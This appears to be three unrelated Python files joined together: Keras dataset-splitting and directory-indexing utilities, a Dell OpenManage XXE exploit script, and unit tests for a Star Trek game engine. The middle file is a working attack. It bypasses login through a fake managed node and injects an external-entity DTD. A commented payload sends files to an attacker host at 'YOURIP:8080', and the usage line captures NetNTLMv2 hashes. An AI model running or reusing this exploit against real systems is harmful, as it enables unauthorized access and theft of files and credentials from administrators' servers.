dataset_as_list.append(np.array(sample))
else:
dataset_as_list.append(sample)
return dataset_as_list
def _get_data_iterator_from_dataset(dataset, dataset_type_spec):
"""Get the iterator from a dataset.
Args:
dataset : A `tf.data.Dataset` object or a list/tuple of arrays.
dataset_type_spec : the type of the dataset
Raises:
ValueError:
- If the dataset is empty.
- If the dataset is not a `tf.data.Dataset` object
or a list/tuple of arrays.
- If the dataset is a list/tuple of arrays and the
length of the list/tuple is not equal to the number
Returns:
iterator: An `iterator` object.
"""
if dataset_type_spec == list:
if len(dataset) == 0:
raise ValueError(
"Received an empty list dataset. "
"Please provide a non-empty list of arrays."
)
if _get_type_spec(dataset[0]) is np.ndarray:
expected_shape = dataset[0].shape
for i, element in enumerate(dataset):
if np.array(element).shape[0] != expected_shape[0]:
raise ValueError(
"Received a list of NumPy arrays with different "
f"lengths. Mismatch found at index {i}, "
f"Expected shape={expected_shape} "
f"Received shape={np.array(element).shape}."
f"Please provide a list of NumPy arrays with "
f"the same length."
)
else:
raise ValueError(
"Expected a list of `numpy.ndarray` objects,"
f"Received: {type(dataset[0])}"
)
return iter(zip(*dataset))
elif dataset_type_spec == tuple:
if len(dataset) == 0:
raise ValueError(
"Received an empty list dataset."
"Please provide a non-empty tuple of arrays."
)
if _get_type_spec(dataset[0]) is np.ndarray:
expected_shape = dataset[0].shape
for i, element in enumerate(dataset):
if np.array(element).shape[0] != expected_shape[0]:
raise ValueError(
"Received a tuple of NumPy arrays with different "
f"lengths. Mismatch found at index {i}, "
f"Expected shape={expected_shape} "
f"Received shape={np.array(element).shape}."
f"Please provide a tuple of NumPy arrays with "
"the same length."
)
else:
raise ValueError(
"Expected a tuple of `numpy.ndarray` objects, "
f"Received: {type(dataset[0])}"
)
return iter(zip(*dataset))
elif dataset_type_spec == tf.data.Dataset:
if is_batched(dataset):
dataset = dataset.unbatch()
return iter(dataset)
elif dataset_type_spec == np.ndarray:
return iter(dataset)
def _get_next_sample(
dataset_iterator,
ensure_shape_similarity,
data_size_warning_flag,
start_time,
):
""" "Yield data samples from the `dataset_iterator`.
Args:
dataset_iterator : An `iterator` object.
ensure_shape_similarity (bool, optional): If set to True, the shape of
the first sample will be used to validate the shape of rest of the
samples. Defaults to True.
data_size_warning_flag (bool, optional): If set to True, a warning will
be issued if the dataset takes longer than 10 seconds to iterate.
Defaults to True.
start_time (float): the start time of the dataset iteration. this is
used only if `data_size_warning_flag` is set to true.
Raises:
ValueError: - If the dataset is empty.
- If `ensure_shape_similarity` is set to True and the
shape of the first sample is not equal to the shape of
atleast one of the rest of the samples.
Yields:
data_sample: A tuple/list of numpy arrays.
"""
try:
dataset_iterator = iter(dataset_iterator)
first_sample = next(dataset_iterator)
if isinstance(first_sample, (tf.Tensor, np.ndarray)):
first_sample_shape = np.array(first_sample).shape
else:
first_sample_shape = None
ensure_shape_similarity = False
yield first_sample
except StopIteration:
raise ValueError(
"Received an empty Dataset. `dataset` must "
"be a non-empty list/tuple of `numpy.ndarray` objects "
"or `tf.data.Dataset` objects."
)
for i, sample in enumerate(dataset_iterator):
if ensure_shape_similarity:
if first_sample_shape != np.array(sample).shape:
raise ValueError(
"All `dataset` samples must have same shape, "
f"Expected shape: {np.array(first_sample).shape} "
f"Received shape: {np.array(sample).shape} at index "
f"{i}."
)
if data_size_warning_flag:
if i % 10 == 0:
cur_time = time.time()
# warns user if the dataset is too large to iterate within 10s
if int(cur_time - start_time) > 10 and data_size_warning_flag:
warnings.warn(
"The dataset is taking longer than 10 seconds to "
"iterate over. This may be due to the size of the "
"dataset. Keep in mind that the `split_dataset` "
"utility is only for small in-memory dataset "
"(e.g. < 10,000 samples).",
category=ResourceWarning,
source="split_dataset",
)
data_size_warning_flag = False
yield sample
def _restore_dataset_from_list(
dataset_as_list, dataset_type_spec, original_dataset
):
"""Restore the dataset from the list of arrays."""
if dataset_type_spec in [tuple, list]:
return tuple(np.array(sample) for sample in zip(*dataset_as_list))
elif dataset_type_spec == tf.data.Dataset:
if isinstance(original_dataset.element_spec, dict):
restored_dataset = {}
for d in dataset_as_list:
for k, v in d.items():
if k not in restored_dataset:
restored_dataset[k] = [v]
else:
restored_dataset[k].append(v)
return restored_dataset
else:
return tuple(np.array(sample) for sample in zip(*dataset_as_list))
return dataset_as_list
def _rescale_dataset_split_sizes(left_size, right_size, total_length):
"""Rescale the dataset split sizes.
We want to ensure that the sum of
the split sizes is equal to the total length of the dataset.
Args:
left_size : The size of the left dataset split.
right_size : The size of the right dataset split.
total_length : The total length of the dataset.
Raises:
TypeError: - If `left_size` or `right_size` is not an integer or float.
ValueError: - If `left_size` or `right_size` is negative or greater
than 1 or greater than `total_length`.
Returns:
tuple: A tuple of rescaled left_size and right_size
"""
left_size_type = type(left_size)
right_size_type = type(right_size)
# check both left_size and right_size are integers or floats
if (left_size is not None and left_size_type not in [int, float]) and (
right_size is not None and right_size_type not in [int, float]
):
raise TypeError(
"Invalid `left_size` and `right_size` Types. Expected: "
"integer or float or None, Received: type(left_size)="
f"{left_size_type} and type(right_size)={right_size_type}"
)
# check left_size is a integer or float
if left_size is not None and left_size_type not in [int, float]:
raise TypeError(
"Invalid `left_size` Type. Expected: int or float or None, "
f"Received: type(left_size)={left_size_type}. "
)
# check right_size is a integer or float
if right_size is not None and right_size_type not in [int, float]:
raise TypeError(
f"Invalid `right_size` Type. "
"Expected: int or float or None,"
f"Received: type(right_size)={right_size_type}."
)
# check left_size and right_size are non-zero
if left_size == 0 and right_size == 0:
raise ValueError(
"Both `left_size` and `right_size` are zero. "
"At least one of the split sizes must be non-zero."
)
# check left_size is non-negative and less than 1 and less than total_length
if (
left_size_type == int
and (left_size <= 0 or left_size >= total_length)
or left_size_type == float
and (left_size <= 0 or left_size >= 1)
):
raise ValueError(
"`left_size` should be either a positive integer "
f"smaller than {total_length}, or a float "
"within the range `[0, 1]`. Received: left_size="
f"{left_size}"
)
# check right_size is non-negative and less than 1 and less than
# total_length
if (
right_size_type == int
and (right_size <= 0 or right_size >= total_length)
or right_size_type == float
and (right_size <= 0 or right_size >= 1)
):
raise ValueError(
"`right_size` should be either a positive integer "
f"and smaller than {total_length} or a float "
"within the range `[0, 1]`. Received: right_size="
f"{right_size}"
)
# check sum of left_size and right_size is less than or equal to
# total_length
if (
right_size_type == left_size_type == float
and right_size + left_size > 1
):
raise ValueError(
"The sum of `left_size` and `right_size` is greater "
"than 1. It must be less than or equal to 1."
)
if left_size_type == float:
left_size = round(left_size * total_length)
elif left_size_type == int:
left_size = float(left_size)
if right_size_type == float:
right_size = round(right_size * total_length)
elif right_size_type == int:
right_size = float(right_size)
if left_size is None:
left_size = total_length - right_size
elif right_size is None:
right_size = total_length - left_size
if left_size + right_size > total_length:
raise ValueError(
"The sum of `left_size` and `right_size` should "
"be smaller than the {total_length}. "
f"Received: left_size + right_size = {left_size+right_size}"
f"and total_length = {total_length}"
)
for split, side in [(left_size, "left"), (right_size, "right")]:
if split == 0:
raise ValueError(
f"With `dataset` of length={total_length}, `left_size`="
f"{left_size} and `right_size`={right_size}."
f"Resulting {side} side dataset split will be empty. "
"Adjust any of the aforementioned parameters"
)
left_size, right_size = int(left_size), int(right_size)
return left_size, right_size
def _get_type_spec(dataset):
"""Get the type spec of the dataset."""
if isinstance(dataset, tuple):
return tuple
elif isinstance(dataset, list):
return list
elif isinstance(dataset, np.ndarray):
return np.ndarray
elif isinstance(dataset, dict):
return dict
elif isinstance(dataset, tf.data.Dataset):
return tf.data.Dataset
else:
return None
def is_batched(tf_dataset):
""" "Check if the `tf.data.Dataset` is batched."""
try:
return tf_dataset.__class__.__name__ == "BatchDataset"
except AttributeError:
return False
def get_batch_size(tf_dataset):
"""Get the batch size of the dataset."""
if is_batched(tf_dataset):
return tf_dataset._batch_size
else:
return None
def index_directory(
directory,
labels,
formats,
class_names=None,
shuffle=True,
seed=None,
follow_links=False,
):
"""Make list of all files in the subdirs of `directory`, with their labels.
Args:
directory: The target directory (string).
labels: Either "inferred"
(labels are generated from the directory structure),
None (no labels),
or a list/tuple of integer labels of the same size as the number of
valid files found in the directory. Labels should be sorted according
to the alphanumeric order of the image file paths
(obtained via `os.walk(directory)` in Python).
formats: Allowlist of file extensions to index (e.g. ".jpg", ".txt").
class_names: Only valid if "labels" is "inferred". This is the explicit
list of class names (must match names of subdirectories). Used
to control the order of the classes
(otherwise alphanumerical order is used).
shuffle: Whether to shuffle the data. Default: True.
If set to False, sorts the data in alphanumeric order.
seed: Optional random seed for shuffling.
follow_links: Whether to visits subdirectories pointed to by symlinks.
Returns:
tuple (file_paths, labels, class_names).
file_paths: list of file paths (strings).
labels: list of matching integer labels (same length as file_paths)
class_names: names of the classes corresponding to these labels, in
order.
"""
if labels is None:
# in the no-label case, index from the parent directory down.
subdirs = [""]
class_names = subdirs
else:
subdirs = []
for subdir in sorted(tf.io.gfile.listdir(directory)):
if tf.io.gfile.isdir(tf.io.gfile.join(directory, subdir)):
if subdir.endswith("/"):
subdir = subdir[:-1]
subdirs.append(subdir)
if not class_names:
class_names = subdirs
else:
if set(class_names) != set(subdirs):
raise ValueError(
"The `class_names` passed did not match the "
"names of the subdirectories of the target directory. "
f"Expected: {subdirs}, but received: {class_names}"
)
class_indices = dict(zip(class_names, range(len(class_names))))
# Build an index of the files
# in the different class subfolders.
pool = multiprocessing.pool.ThreadPool()
results = []
filenames = []
for dirpath in (tf.io.gfile.join(directory, subdir) for subdir in subdirs):
results.append(
pool.apply_async(
index_subdirectory,
(dirpath, class_indices, follow_links, formats),
)
)
labels_list = []
for res in results:
partial_filenames, partial_labels = res.get()
labels_list.append(partial_labels)
filenames += partial_filenames
if labels not in ("inferred", None):
if len(labels) != len(filenames):
raise ValueError(
"Expected the lengths of `labels` to match the number "
"of files in the target directory. len(labels) is "
f"{len(labels)} while we found {len(filenames)} files "
f"in directory {directory}."
)
else:
i = 0
labels = np.zeros((len(filenames),), dtype="int32")
for partial_labels in labels_list:
labels[i : i + len(partial_labels)] = partial_labels
i += len(partial_labels)
if labels is None:
print(f"Found {len(filenames)} files.")
else:
print(
f"Found {len(filenames)} files belonging "
f"to {len(class_names)} classes."
)
pool.close()
pool.join()
file_paths = [tf.io.gfile.join(directory, fname) for fname in filenames]
if shuffle:
# Shuffle globally to erase macro-structure
if seed is None:
seed = np.random.randint(1e6)
rng = np.random.RandomState(seed)
rng.shuffle(file_paths)
rng = np.random.RandomState(seed)
rng.shuffle(labels)
return file_paths, labels, class_names
def iter_valid_files(directory, follow_links, formats):
if not follow_links:
walk = tf.io.gfile.walk(directory)
else:
walk = os.walk(directory, followlinks=follow_links)
for root, _, files in sorted(walk, key=lambda x: x[0]):
for fname in sorted(files):
if fname.lower().endswith(formats):
yield root, fname
def index_subdirectory(directory, class_indices, follow_links, formats):
"""Recursively walks directory and list image paths and their class index.
Args:
directory: string, target directory.
class_indices: dict mapping class names to their index.
follow_links: boolean, whether to recursively follow subdirectories
(if False, we only list top-level images in `directory`).
formats: Allowlist of file extensions to index (e.g. ".jpg", ".txt").
Returns:
tuple `(filenames, labels)`. `filenames` is a list of relative file
paths, and `labels` is a list of integer labels corresponding to these
files.
"""
dirname = os.path.basename(directory)
valid_files = iter_valid_files(directory, follow_links, formats)
labels = []
filenames = []
for root, fname in valid_files:
labels.append(class_indices[dirname])
absolute_path = tf.io.gfile.join(root, fname)
relative_path = tf.io.gfile.join(
dirname, os.path.relpath(absolute_path, directory)
)
filenames.append(relative_path)
return filenames, labels
def get_training_or_validation_split(samples, labels, validation_split, subset):
"""Potentially restict samples & labels to a training or validation split.
Args:
samples: List of elements.
labels: List of corresponding labels.
validation_split: Float, fraction of data to reserve for validation.
subset: Subset of the data to return.
Either "training", "validation", or None. If None, we return all of the
data.
Returns:
tuple (samples, labels), potentially restricted to the specified subset.
"""
if not validation_split:
return samples, labels
num_val_samples = int(validation_split * len(samples))
if subset == "training":
print(f"Using {len(samples) - num_val_samples} files for training.")
samples = samples[:-num_val_samples]
labels = labels[:-num_val_samples]
elif subset == "validation":
print(f"Using {num_val_samples} files for validation.")
samples = samples[-num_val_samples:]
labels = labels[-num_val_samples:]
else:
raise ValueError(
'`subset` must be either "training" '
f'or "validation", received: {subset}'
)
return samples, labels
def labels_to_dataset(labels, label_mode, num_classes):
"""Create a tf.data.Dataset from the list/tuple of labels.
Args:
labels: list/tuple of labels to be converted into a tf.data.Dataset.
label_mode: String describing the encoding of `labels`. Options are:
- 'binary' indicates that the labels (there can be only 2) are encoded as
`float32` scalars with values 0 or 1 (e.g. for `binary_crossentropy`).
- 'categorical' means that the labels are mapped into a categorical
vector. (e.g. for `categorical_crossentropy` loss).
num_classes: number of classes of labels.
Returns:
A `Dataset` instance.
"""
label_ds = tf.data.Dataset.from_tensor_slices(labels)
if label_mode == "binary":
label_ds = label_ds.map(
lambda x: tf.expand_dims(tf.cast(x, "float32"), axis=-1),
num_parallel_calls=tf.data.AUTOTUNE,
)
elif label_mode == "categorical":
label_ds = label_ds.map(
lambda x: tf.one_hot(x, num_classes),
num_parallel_calls=tf.data.AUTOTUNE,
)
return label_ds
def check_validation_split_arg(validation_split, subset, shuffle, seed):
"""Raise errors in case of invalid argument values.
Args:
validation_split: float between 0 and 1, fraction of data to reserve for
validation.
subset: One of "training", "validation" or "both". Only used if
`validation_split` is set.
shuffle: Whether to shuffle the data. Either True or False.
seed: random seed for shuffling and transformations.
"""
if validation_split and not 0 < validation_split < 1:
raise ValueError(
"`validation_split` must be between 0 and 1, "
f"received: {validation_split}"
)
if (validation_split or subset) and not (validation_split and subset):
raise ValueError(
"If `subset` is set, `validation_split` must be set, and inversely."
)
if subset not in ("training", "validation", "both", None):
raise ValueError(
'`subset` must be either "training", '
f'"validation" or "both", received: {subset}'
)
if validation_split and shuffle and seed is None:
raise ValueError(
"If using `validation_split` and shuffling the data, you must "
"provide a `seed` argument, to make sure that there is no "
"overlap between the training and validation subset."
)
|
#This is just a Python version of the https://www.exploit-db.com/exploits/39909
#Also check out https://github.com/hantwister/FakeDellOM
#You need to have openssl installed
from xml.sax.saxutils import escape
import BaseHTTPServer
import requests
import thread
import ssl
import sys
import re
import os
import urllib3
urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
if len(sys.argv) < 3:
print 'Usage python xxe_openmanage.py <yourIP> <targetIP>:<targetPort> http://yourip:8080/some.dtd'
print 'Get a NetNTLMv2 hash: Usage python xxe_openmanage.py <yourIP> <targetIP>:<targetPort> file://\\yourip'
exit()
#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
#Also check out https://github.com/hantwister/FakeDellOM
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(s):
myIP = sys.argv[1]
XXEUrl = sys.argv[3]
data = ''
content_len = int(s.headers.getheader('content-length', 0))
post_body = s.rfile.read(content_len)
s.send_response(200)
s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
s.end_headers()
if "__00omacmd=getuserrightsonly" in post_body:
data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>")
if "__00omacmd=getaboutinfo " in post_body:
data = escape("<ProductVersion>6.0.3</ProductVersion>")
if "__00omacmd=getcmdlogcontent" in post_body:
data = escape('''<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE bogus [ <!ENTITY % dtd SYSTEM "'''+XXEUrl+'''"> %dtd;]]><bogus><blah /></bogus>''')
#Paylod for DTD if you use it
#<!ENTITY % all "<!ENTITY % send SYSTEM 'http://YOURIP:8080/xxe?result=%file;'>"> %all;
if data:
requid = re.findall('>uuid:(.*?)<',post_body)[0]
s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule">
<s:Header>
<wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
<wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo>
<wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID>
</s:Header>
<s:Body>
<n1:SendCmd_OUTPUT>
<n1:ResultCode>0</n1:ResultCode>
<n1:ReturnValue>'''+data+'''</n1:ReturnValue>
</n1:SendCmd_OUTPUT>
</s:Body>
</s:Envelope>''')
else:
s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''')
def log_message(self, format, *args):
return
createdCert = False
if not os.path.isfile('./server.pem'):
print '[-] No server.pem certifcate file found. Generating one...'
os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
createdCert = True
def startServer():
server_class = BaseHTTPServer.HTTPServer
httpd = httpd = server_class(('0.0.0.0', 443), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
thread.start_new_thread(startServer,())
myIP = sys.argv[1]
target = sys.argv[2]
def bypassAuth():
values = {}
url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
data = {"manuallogin": "true", "targetmachine": myIP, "user": "XXE", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
r = requests.post(url, data=data, verify=False, allow_redirects=False)
cookieheader = r.headers['Set-Cookie']
sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
pathid = re.findall('Path=/(.*?);',cookieheader)
values['sessionid'] = sessionid[0]
values['pathid'] = pathid[0]
return values
ids = bypassAuth()
sessionid = ids['sessionid']
pathid = ids['pathid']
print "Session: "+sessionid
print "VID: "+pathid
def triggerXXE(target,sessid,pathid):
url = "https://{}/{}/DataArea?plugin=com.dell.oma.webplugins.CmdLogWebPlugin&vid={}".format(target,pathid,pathid)
cookies = {"JSESSIONID": sessid}
r = requests.get(url, cookies=cookies, verify=False)
#print r.content
print 'Triggering XXE'
triggerXXE(target,sessionid,pathid)
|
from typing import Dict
from typing import NewType
from typing import cast
from logging import Logger
from logging import getLogger
from math import degrees
from pytrek.engine.Computer import Computer
from pytrek.engine.Direction import Direction
from pytrek.engine.DirectionData import DirectionData
from pytrek.engine.PlayerType import PlayerType
from pytrek.engine.ShieldHitData import ShieldHitData
from pytrek.engine.GameEngine import GameEngine
from pytrek.engine.devices.DeviceStatus import DeviceStatus
from pytrek.engine.devices.DeviceType import DeviceType
from pytrek.engine.devices.Devices import Devices
from pytrek.model.Coordinates import Coordinates
from pytrek.settings.GameSettings import GameSettings
from pytrek.settings.SettingsCommon import SettingsCommon
from pytrek.GameState import GameState
from unittest import TestSuite
from unittest import main as unitTestMain
from tests.TestBase import TestBase
TestedDirections = NewType('TestedDirections', Dict[Direction, bool])
class TestGameEngine(TestBase):
"""
"""
clsLogger: Logger = cast(Logger, None)
@classmethod
def setUpClass(cls):
TestBase.setUpLogging()
TestGameEngine.clsLogger = getLogger(__name__)
SettingsCommon.determineSettingsLocation()
def setUp(self):
self.logger: Logger = TestGameEngine.clsLogger
self._gameSettings: GameSettings = GameSettings()
self._gameEngine: GameEngine = GameEngine()
self._gameState: GameState = GameState()
self._computer: Computer = Computer()
self._devices: Devices = Devices()
def tearDown(self):
pass
def testComputeHitValueOnKlingon(self):
testKlingonPower: float = 480.0
enterprisePosition: Coordinates = Coordinates(x=0, y=0)
klingonPosition: Coordinates = Coordinates(x=0, y=9)
for x in range(10):
kHit: float = self._gameEngine.computeHitValueOnKlingon(enterprisePosition=enterprisePosition,
klingonPosition=klingonPosition,
klingonPower=testKlingonPower)
self.logger.info(f'Iteration: {x} - kHit={kHit:.2f}')
if kHit <= testKlingonPower:
self.assertLess(kHit, testKlingonPower, 'Single torpedo can almost never kill a Klingon')
else:
self.logger.info(f'Iteration: {x} killed a Klingon')
def testComputeCourseStraightWest(self):
end: Coordinates = Coordinates(x=0, y=5)
start: Coordinates = Coordinates(x=9, y=5)
course: float = self._gameEngine._computeCourse(start=start, end=end)
angle: float = degrees(course)
self.assertEqual(180, angle, 'Did calculation chang')
self.logger.info(f'{course=} {angle=}')
def testComputeCourseDown(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=0, y=9)
course: float = self._gameEngine._computeCourse(start=start, end=end)
downAngle: float = degrees(course)
self.assertEqual(90, downAngle, 'Hmm, messed up code')
self.logger.info(f'{course=} {downAngle=}')
def testComputeCourseUp(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=0, y=9)
backwardCourse: float = self._gameEngine._computeCourse(start=end, end=start)
backAngle: float = degrees(backwardCourse)
self.assertEqual(-90, backAngle, 'Who changed my code')
self.logger.info(f'{backwardCourse=} {backAngle=}')
def testComputeCourseDiagonal(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=9, y=9)
course: float = self._gameEngine._computeCourse(start=start, end=end)
angle: float = degrees(course)
self.assertEqual(45, angle, 'Busted code')
self.logger.info(f'{course=} {angle=}')
def testComputeCourseBackDiagonal(self):
start: Coordinates = Coordinates(x=0, y=0)
end: Coordinates = Coordinates(x=9, y=9)
backwardCourse: float = self._gameEngine._computeCourse(start=end, end=start)
backAngle: float = degrees(backwardCourse)
self.assertEqual(-135, backAngle, 'Who changed my code')
self.logger.info(f'{backwardCourse=}, {backAngle=}')
def testComputeCourseStraightEast(self):
start: Coordinates = Coordinates(x=0, y=5)
end: Coordinates = Coordinates(x=9, y=5)
course: float = self._gameEngine._computeCourse(start=start, end=end)
angle: float = degrees(course)
self.assertEqual(0, angle, 'Did calculation chang')
self.logger.info(f'{course=} {angle=}')
def testUpdateTimeAfterWarpTravelShortWarpSpeedLow(self):
previousStarDate: float = self._gameState.starDate
previousRemainGameTime: float = self._gameState.remainingGameTime
travelDistance: float = 1.0
warpFactor: float = 1.0
self._gameEngine.updateTimeAfterWarpTravel(travelDistance=travelDistance, warpFactor=warpFactor)
updatedOpTime: float = self._gameState.opTime
expectedOpTime: float = 10.0
self.assertEqual(expectedOpTime, updatedOpTime, 'Operation Time incorrectly calculated')
expectedStarDate: float = previousStarDate + updatedOpTime
actualStarDate: float = self._gameState.starDate
self.assertEqual(expectedStarDate, actualStarDate, 'StarDate was inappropriately updated')
expectedRemainingGameTime: float = previousRemainGameTime - updatedOpTime
actualRemainingGameTime: float = self._gameState.remainingGameTime
self.assertEqual(expectedRemainingGameTime, actualRemainingGameTime, 'Remaining Game Time was inappropriately updated')
def testUpdateTimeAfterWarpTravelLong(self):
previousStarDate: float = self._gameState.starDate
previousRemainGameTime: float = self._gameState.remainingGameTime
travelDistance: float = 9.0
warpFactor: float = 9.0
self._gameEngine.updateTimeAfterWarpTravel(travelDistance=travelDistance, warpFactor=warpFactor)
updatedOpTime: float = self._gameState.opTime
expectedOpTime: float = 1.11
self.assertAlmostEqual(expectedOpTime, updatedOpTime, 2, 'Operation Time incorrectly calculated')
expectedStarDate: float = previousStarDate + updatedOpTime
actualStarDate: float = self._gameState.starDate
self.assertEqual(expectedStarDate, actualStarDate, 'StarDate was inappropriately updated')
expectedRemainingGameTime: float = previousRemainGameTime - updatedOpTime
actualRemainingGameTime: float = self._gameState.remainingGameTime
self.assertEqual(expectedRemainingGameTime, actualRemainingGameTime, 'Remaining Game Time was inappropriately updated')
def testShipAdjacentToBaseNorth(self):
"""
In these tests the base is always at sector coordinates 5,5
"""
shipPosition: Coordinates = Coordinates(x=4, y=5)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly north')
def testShipAdjacentToBaseSouth(self):
shipPosition: Coordinates = Coordinates(x=5, y=5)
basePosition: Coordinates = Coordinates(x=6, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly south')
def testShipAdjacentToBaseEast(self):
shipPosition: Coordinates = Coordinates(x=6, y=5)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly east')
def testShipAdjacentToBaseWest(self):
shipPosition: Coordinates = Coordinates(x=4, y=5)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly west')
def testShipAdjacentToBaseNorthEast(self):
shipPosition: Coordinates = Coordinates(x=4, y=6)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly NorthEast')
def testShipAdjacentToBaseNorthWest(self):
shipPosition: Coordinates = Coordinates(x=4, y=4)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly NorthWest')
def testShipAdjacentToBaseSouthEast(self):
shipPosition: Coordinates = Coordinates(x=6, y=6)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly SouthEast')
def testShipAdjacentToBaseSouthWest(self):
shipPosition: Coordinates = Coordinates(x=6, y=4)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertTrue(adjacent, 'We are directly SouthWest')
def testShipAdjacentToBaseNotAdjacentClose(self):
shipPosition: Coordinates = Coordinates(x=7, y=7)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertFalse(adjacent, 'We are pretty close but not adjacent')
def testShipAdjacentToBaseNotAdjacentVeryFar(self):
shipPosition: Coordinates = Coordinates(x=9, y=9)
basePosition: Coordinates = Coordinates(x=5, y=5)
adjacent: bool = self._gameEngine.shipAdjacentToBase(shipPosition=shipPosition, basePosition=basePosition)
self.assertFalse(adjacent, 'We are very far and not adjacent')
def testDoPhasersMaxDistance(self):
shooterCoordinates: Coordinates = Coordinates(0, 0)
targetCoordinates: Coordinates = Coordinates(9, 9)
expectedPhaserHit: float = 218.6
self._runPhaserTest(shooterCoordinates=shooterCoordinates, targetCoordinates=targetCoordinates, expectedPhaserHit=expectedPhaserHit)
def testDoPhasersShortDistance(self):
shooterCoordinates: Coordinates = Coordinates(0, 4)
targetCoordinates: Coordinates = Coordinates(4, 4)
expectedPhaserHit: float = 239.68
self._runPhaserTest(shooterCoordinates=shooterCoordinates, targetCoordinates=targetCoordinates, expectedPhaserHit=expectedPhaserHit)
def testHitThem(self):
shooterCoordinates: Coordinates = Coordinates(0, 0)
targetCoordinates: Coordinates = Coordinates(9, 9)
distance: float = self._computer.computeQuadrantDistance(startSector=shooterCoordinates, endSector=targetCoordinates)
enemyPower: float = 500.0
powerDrain: float = self._gameEngine.hitThem(distance=distance, hit=218.6, enemyPower=enemyPower)
minPowerDrain: float = 329
self.assertGreater(powerDrain, minPowerDrain, 'Did not calculate the minimum power drain')
self.logger.info(f'{powerDrain=}')
def testComputeShieldHitShieldsFull(self):
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 1000, 'Shields should absorb all')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 0, 'Nothing should pass through')
def testComputeShieldHitShieldsHalf(self):
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields // 2)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 500, 'Shields should absorb half')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 500, 'Half should pass through')
def testComputeShieldHitShieldsQuarter(self):
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields // 4)
self.assertEqual(shieldHitData.shieldAbsorptionValue, 250, 'Shields should absorb 1/4')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 750, '3/4 should pass through')
def testComputeShieldHitShieldsDown(self):
saveShieldStatus: DeviceStatus = self._devices.getDeviceStatus(DeviceType.Shields)
self._devices.setDeviceStatus(DeviceType.Shields, DeviceStatus.Down)
shieldHitData: ShieldHitData = self._gameEngine.computeShieldHit(torpedoHit=1000,
currentShieldPower=self._gameSettings.defaultFullShields)
